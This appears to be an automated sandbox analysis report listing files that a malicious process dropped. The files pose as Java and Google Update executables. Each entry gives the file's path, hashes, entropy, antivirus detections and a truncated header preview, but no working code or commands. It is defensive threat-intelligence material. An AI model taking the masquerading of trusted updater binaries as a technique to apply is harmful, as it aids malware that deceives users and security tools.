Encrypted:	false
SSDEEP:	24576:90vHyeLj8trn3wsHsqjnhMgeiCl7G0nehbGZpbD:gtj4rgsbDmg27RnWGj
MD5:	2BD0CC32037ACC7A6F63B092B5D35708
SHA1:	B0E7C7389D0315CD5AC27C02FB73A531C51F8CA3
SHA-256:	690A8CB734066F7F5EB0498EE3D7F9514C31D3C98C4B03D206429A61884E9065
SHA-512:	EA72D52FF3F91F10102461BD29CAFF47375083801CD6A8A319ACED3C831F33266046078D0F9B763BD9EF5D70A04717BED56CC1BEFD7EB96D45DA2FB1D278F325
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`......U.......................................<........P...\|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....\|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1781760
Entropy (8bit):	7.279663246257367
Encrypted:	false
SSDEEP:	24576:DoMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZCsqjnhMgeiCl7G0nehbGZpv:K4i0wGJra0uAUfkVy7/ZGDmg27RnWGj
MD5:	6A02C3885512A46C56B20351D9116330
SHA1:	01217A4E4D67903B263CCFA21DE98E6A4C88095A
SHA-256:	1A9E2F69FEA1D26193E73591B4CEAB2EF424B787D796DC19274268B2C704D399
SHA-512:	E57AFE807B16F2C74EC474BD0B7F45806C572102A4DBF63BAB41283374145497649C86785AD6B64502AF67929776F9A5A6F7A7BD20DC6EA99EDF4253AE79E10D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1318400
Entropy (8bit):	7.44875950521882
Encrypted:	false
SSDEEP:	24576:UeR0gB6axoCf0R6RLQRF/TzJqe58BimJsqjnhMgeiCl7G0nehbGZpbD:ggHxmR6uBTzge5MimNDmg27RnWGj
MD5:	93353A7605A152A5486D4072C6BC2A8A
SHA1:	EE32547CC9A1B9AAB4EF1CD94CC08BEA67C11B4A
SHA-256:	73E075D1A73FE4E1785FB52DA2399D1A7264A50BC8443DA041D67007B22F704F
SHA-512:	E493EEA96D5526DA6BC3C53CD129B38B375AC52328118E8966047917D6F4582C97FF8E6FA2F379B7E763DEA10343A526037747D4EC05ED2A46C43DC0E947D91A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`.......0......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446059818775259
Encrypted:	false
SSDEEP:	12288:inEbH0j4x7R6SvyCM3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:ikwOtO73sqjnhMgeiCl7G0nehbGZpbD
MD5:	8217C780FB6F68530FAD0891099785B3
SHA1:	6E23783712C1894E16817A1512B6A42020181EC8
SHA-256:	5A1D09745869FA40BBE231447A370C5E7F079886B05181BF72302C10A530C7E9
SHA-512:	1514FFF346BCDCE7458FEE052A799AE7150E98283A6CCA5E378F57D6BC4D6A5357B52D83CED44C28A804BCC58E115F6BB860580095B16B97BF93C9B8D0A4F6C0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.44680261925875
Encrypted:	false
SSDEEP:	24576:rnU/h/4KAsqjnhMgeiCl7G0nehbGZpbD:rU/V8Dmg27RnWGj
MD5:	5383673009C4B88B62F206180BB90794
SHA1:	ACFCAF028F070149428DE6835F437B501A24FAE2
SHA-256:	39BC49242FB83C5F8E0319D110FEBC50078616FBBDF553AE55803AE65427401F
SHA-512:	AA1BF24A8F5C46EE5BBE04E7BF64BE82A49AFCBC2020126A1E4C675986379E6C49CE1076F4F23AE3C770533D622F8C2F6F29D1647ADCFDAC0A078E77900528F5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	5.483737120963877
Encrypted:	false
SSDEEP:	24576:9x71iBLZ05jNTmJWExjsqjnhMgeiCl7G0nehbGZpbD:9xhiHIjNgnDmg27RnWGj
MD5:	E5C7114331B8B936FAF1106F427BBAFF
SHA1:	9628F988C2D9D4B216E730E12DCD1D3D1C9AEAB0
SHA-256:	46A097A8E3811E4D347BA071DA1B66D44102F9612968C690A5F1537CAA4AA583
SHA-512:	16C9651FDFF4B6AC730BFFA5845CBA44C7D0A8137221F7DADC05699A0202F3D72619A4E2205614F987A3C7A33C1B3ACD0B7A870D6ECBF3EAD502CF0A297E0E6B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.................................2...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1419264
Entropy (8bit):	5.466709633523164
Encrypted:	false
SSDEEP:	24576:plnRklQ6fgJcEwixBsqjnhMgeiCl7G0nehbGZpbD:VoRfgJcEwCVDmg27RnWGj
MD5:	9CF74CFEA29672CCCD5B10A239133A9B
SHA1:	5C9D21626E0AD1F2476C03334F832C1E786ADF6C
SHA-256:	9ECE8FAD4F8ED7ABC256A6900A4F005F57D38638CE94D5452DBD13D7C50589A1
SHA-512:	9D701682EA022A615D7836E89F05407C3D0C302CC37D3F65F1D9F87271587B388848EA4C08FFDE710A8E609F144D17DE179B2A69145F2466554C3C024C925F01
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@.........................................................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1522176
Entropy (8bit):	5.496520302008692
Encrypted:	false
SSDEEP:	24576:lW25k8hb0Haw+xRsqjnhMgeiCl7G0nehbGZpbD:lWyk8SHawmlDmg27RnWGj
MD5:	555C6CBD88E4008CBCB745799FDBFD67
SHA1:	B4FE8549A36BE359B5954AA0686A9291E7BF17A3
SHA-256:	9D5DEF0DE75C80C21148FF473FC40A937D050BBBE73956824299B8D45B295252
SHA-512:	E80AF4CF15321A358A5481663F52C7308A96F2611E7DC997DF57453E4D2039AF7CE62D8A2954EE359F1BA7B71F4E4BAFE2109A966A8DAA2532267A71E233620D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................Hw.... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	5.163943310614338
Encrypted:	false
SSDEEP:	12288:XWP/aK2vB+GXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:XKCKAB5sqjnhMgeiCl7G0nehbGZpbD
MD5:	424398EA9EDCA5F4D7BD6BEA7059489B
SHA1:	CCD37E76A15ABEE09E28AF43893BEF3F18E9768E
SHA-256:	9449C50059B78387E58CA49AE016280F8EAB76B3703801BF6F7F478517E33371
SHA-512:	196F5D4436045F23FCF3EF4062EC4503BD99BA96A66F7800E355D1DF0AAB7D1DE954D421623F185792809B4192EE207945192023A9B6643F09D2C1BAE642AA6D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U..Q..U..V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.................................Z.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228288
Entropy (8bit):	5.162023288202005
Encrypted:	false
SSDEEP:	12288:qO7cCNWB+09wXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:XjNWBP2sqjnhMgeiCl7G0nehbGZpbD
MD5:	FDC15B24FAD43E1388BE9D84116814AC
SHA1:	0AAEB2913EE8863C37B301360F661BEE9BCC6567
SHA-256:	53D5F57FCCE9D5DE2A39E6D4823BF627870E59F73A3D40AB4D3065B16745FF4D
SHA-512:	29D1FCF310BED20DC6AD04C56F53F7FA2C365AD4B663107079BF3CA46750CD264CBC5E5B4761DD3E58646B3206EF5EB54AD558ED8004D58A93B6159D74FD74DB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..................................,.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1302528
Entropy (8bit):	5.238919878778569
Encrypted:	false
SSDEEP:	24576:HihRyhdsRrEsqjnhMgeiCl7G0nehbGZpbD:HihsoRgDmg27RnWGj
MD5:	3971CFE93626743F0FA0C74B863DEE94
SHA1:	88A0641F391F7BC9E8628568DF107C27780E7C8F
SHA-256:	C02C3C19DF810F93221B05F3942AA0574150930275BFB3560B1AD1D86445639D
SHA-512:	2F43EAD7697306753299FA5B42746562F91C5531D055524B2DDC66BCF11139849FFC3F545AFF73AE2DFED51FA54A7B33D9E2BCF2A5E3F8C5D8DFB93686FA978E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~...X..~..X...2..X...2..X...2...X...3..X..~..X..~..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p.......+.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1342464
Entropy (8bit):	5.351003617291314
Encrypted:	false
SSDEEP:	24576:D1FDmRF+wpx/QafPsqjnhMgeiCl7G0nehbGZpbD:PmRF+wn/JfzDmg27RnWGj
MD5:	AD3C337690ED15020B39140C4ABFE8CC
SHA1:	5CA9140CBF89A2CE34C0678CA15816BDB11965CC
SHA-256:	3B1D01A11029DAD2553DE3D41DD2214F2AE330AE92206D94B83C9465206E0ABA
SHA-512:	8B31FCB2281DE01BFDDF5484567155C34B6E342784CE45408259D2CD7385DF539E18CBBEB7E715D612275DAA75FFE6507E25CD5286602848B35829E0953E1F21
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................N................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228288
Entropy (8bit):	5.161978027368294
Encrypted:	false
SSDEEP:	12288:P2Ae621B+0YiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:uE21BPdsqjnhMgeiCl7G0nehbGZpbD
MD5:	74C313E0364B545AF7114B47C2E4F6A7
SHA1:	4A10478F96C687E419DF946219330627F8DFE4B0
SHA-256:	A3C92FF3538C87FB435E58B57D290D7ED3611EC199274794DFA96185FB2B1993
SHA-512:	38F41AB44C85F248C7589F3933C2EDD09DCD09B80F1D4B3F96CD66BFB6BCFF3D10DFC56C9C9FD85A56DCF28B46C683F87E30F45D3256181B5BC0B27F8FBAC9DF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................+........................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	105669632
Entropy (8bit):	7.999989846634672
Encrypted:	true
SSDEEP:	3145728:1LAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:1BWx/pt8U7E6aZRfIICU
MD5:	0C454F15CAF793574D9628176ADE0B21
SHA1:	78B16D675E218B2AD2BA08AF3381F8BF3BEBEFA3
SHA-256:	BB1ADEFE85BFE5FD3A822F0EB564E019398DA9AD7928C6DAB8A08BF8CC1E81C7
SHA-512:	0DB46C5E93BD9BED61B9F95B331D7A5B36DA69AB0A9B2B0B175AE62D7B6AB12225FECAE31A4CCFDA19852C8554540BD4529C660BFFABF3FEA8FDDB38860860BA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......4...LC................@..............................L.......L... ..................................................X..P........+C.....\|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..\|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1158144
Entropy (8bit):	5.068080904031066
Encrypted:	false
SSDEEP:	12288:A5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:A5sqjnhMgeiCl7G0nehbGZpbD
MD5:	F3408FF79077D9AB8C00A37ADD939CD2
SHA1:	AC9E2B6DABFB5AC805BED1C018A618EB9230685B
SHA-256:	56278B84E7044F15713FC9DB84B8246D8C1AA1F961F0D01926CAEDB548983AC4
SHA-512:	58E698BB072315197CC8E723D44FD252063D383B2F917409515FEECA4E6D0DB048F563E3188D0F5290165CA77A88D50E1733BA3DC9A7FC7F8BF558D5D3C79B5B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.........................................................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032410498680992
Encrypted:	false
SSDEEP:	12288:xKmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:kmsqjnhMgeiCl7G0nehbGZpbD
MD5:	ACDD193644A3ED31A1F16B23A304DA7B
SHA1:	756EC7B94668CDA23543ACC63A23E4EFB5109971
SHA-256:	2BFF6513B0BD350912F2648BB457CB3728DECAC05EC07985CA13593C8F42BA24
SHA-512:	4A39121FA9B75A6FA17D376AC1982DAC5CC56F899AF870ADB2859B55CC4F23D7B9E317137B9E861CB45D7832EA81BC146F48F800DD5945EE14BB4B2079FBBF89
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................]........................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446059825196583
Encrypted:	false
SSDEEP:	12288:inEbH0j4x7R6SvyCM3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:ikwOtO73sqjnhMgeiCl7G0nehbGZpbD
MD5:	1BFD427962F8745CDB6D868AE97547B7
SHA1:	C0BF2EEC329205206EF7F5DB64A158B19E9AF8F0
SHA-256:	24C52FAB4A52953FE2C0971929F598DEFCC47CA53C9CCBEAA52F70F5B9F7D730
SHA-512:	9042B1561E154F0E760192B805DA0DA881868098F9C99579D973B54007573492E398952E2768A5BE26DAED3213B106E12766980EACB9E39B0CDDE657A64C202F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1212416
Entropy (8bit):	5.119725376768161
Encrypted:	false
SSDEEP:	12288:tv1vvaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:p16sqjnhMgeiCl7G0nehbGZpbD
MD5:	C224C763CC207BF0F2B8BDC43615C7EE
SHA1:	1FDFCEFC73958AD399964FA83049C37F99B0522B
SHA-256:	948CE1BC3749D463D172A9D85C1D4B65C153ADD17AEA2A97418E7AC555D294D5
SHA-512:	586C7B50CCD5DBC9D7D1E5C5F2E93719A46446717B71CDC6EA04BF76929BA0B706162DA9D85F77B0581472A2A8F569BB8EF6902EF1486D2363A73909EB16DD86
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.................................0.......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.4468134518193105
Encrypted:	false
SSDEEP:	24576:TnU/h/4KAsqjnhMgeiCl7G0nehbGZpbD:TU/V8Dmg27RnWGj
MD5:	C5306C394B084DFE7F24D8BEB1B461DA
SHA1:	41AC0234E97897ECDA96F089C11BCC17304DB7E0
SHA-256:	08FD109706BEF9699A48DA4CBC386D5FF240435BB1F44AC8C7012DF8CBED26B8
SHA-512:	F9FAA4AE985CC08543BABA21D0560BBAF7C7D3D52B8487EBAEFDC447CD1F6C75F28D78D721478849FE558D7F582409858E84EBD80A09C9E5DDC66B0B9E2318E2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	5.483735984490015
Encrypted:	false
SSDEEP:	24576:Ex71iBLZ05jNTmJWExjsqjnhMgeiCl7G0nehbGZpbD:ExhiHIjNgnDmg27RnWGj
MD5:	DA0FABAF70D7C1C2F8A1061EFE77EF12
SHA1:	CCA84D54AF550E8C52A9021657F7A67627A11529
SHA-256:	BA901A9C002215A2F5AE5F4C621A4E2461031841C2D67DA2A88D5A9659A6A3C2
SHA-512:	0D362743F4CDAEA088BCD4877611F3761A5D8884CDE8D2D9D091320F79FD3E2030AC191B49B183DA8444D283FE11835F8C17007755905DDE1C68B1F3722B4275
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.................................J ..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032874323093361
Encrypted:	false
SSDEEP:	12288:83rWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:A6sqjnhMgeiCl7G0nehbGZpbD
MD5:	E4C00EC2C2DE3A2BC905DBD255B70D3C
SHA1:	AC5EC00700FF13A56885BAD10D2E4C23F1D87DFB
SHA-256:	FCE76D3396C54D013628CB68835CD0817A313D60D272B14387A8822DB72B9DA0
SHA-512:	B0C59CD71247A6742AB11517E6191A292AE8456F1E3AAB7B97C3657D9327B2AC5AF588DBF0E63CD9428D73125B09807BCFCF8B6294F25BEC202AF7A0A66558C1
Malicious:	true
